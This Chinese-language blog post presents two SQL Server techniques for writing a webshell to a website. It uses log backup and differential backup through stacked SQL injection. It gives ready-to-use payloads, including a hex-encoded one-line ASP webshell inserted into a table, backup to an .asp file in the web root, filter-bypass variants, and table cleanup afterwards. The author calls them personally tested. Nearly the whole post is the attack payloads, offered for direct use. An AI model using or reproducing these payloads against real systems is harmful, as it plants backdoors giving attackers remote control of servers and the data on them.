sqlserver的两种备份getshell(干货)

log备份这是一种导出日志文件到web路径来getshell的方法
本次简述一下通过sqlserver进行getshell的两种方法,payload可以直接拿来用,话不多说,直接往下看就完事了
 
优势:
1、重复性好,多次备份的成功率高
2、相对于差异备份而言,shell的体积较小
 
利用条件:至少DBO权限
1、前提得知绝对路径,并且可写
2、站库不分离
3、数据库必须被备份过一次
 
 
第一步:
;alter database 库名 set RECOVERY FULL--
 
第二步:
;create table 数据库名..表名(a image)--     //建表
 
 
第三步:
;insert into 数据库名..表名(a) values (0x一句话木马)--     //插入一句话木马到表中,注意16进制
 
第四步:
;backup database 数据库名 to disk = c:\www\panda.bak--          //先手动给test1备份一遍
 
第五步:
;backup log 数据库名 to disk = c:\www\panda.asp with init--          //利用log备份到web路径getshell
 
 
第六步:
;Drop table 数据库名..表名--     //删除表
 
 
 
差异备份的条件:至少DBO权限
 
1、前提知道绝对路径,路径可写。
2、HTTP 500错误不是自定义
3、WEB和数据在一块。还有的就是数据库中不能存在%号之类的,不然也是不成功的。
4、数据量不能太大
 
 
第一步:
;backup database 库名 to disk = c:\bak.bak ;--    //先手动备份一次
 
 
如果被过滤,用下方的payload:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x备份路径\xx.bak backup database @a to disk=@s--     //0x备份的数据库名转换成16位进制,db_name()里面可以加数字备份不同的数据库
 
 
第二步:
;create table 数据库名..表名(a image)--     //建立表,加字段
 
 
第三步:
;insert into 数据库名..表名(a) values (0x一句话木马)--     //插入一句话木马到表中,注意16进制

 

第四步:
;backup database 库名 to disk = c:\shell.asp with differential , format ;--    //进行差异备份
 
 
如果被过滤,用下方的payload:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x备份路径\xx.asp backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--     //备份到路径\xx.asp,前提是已得知路径,注意转换为16进制,假如备份的路径为c:\webroot\panda.asp ,访问查看是否备份getshell成功
 
 
第五步:
;Drop table 数据库..表名--     //备份完getshell过后删除表

 

文中的方法和payload亲测可用的,至于图片,可以稍微的自行脑补,在注入点上操作即可

sqlserver的两种备份getshell(干货)

上一篇:Sql过滤


下一篇:Java 连接数据库的五种方式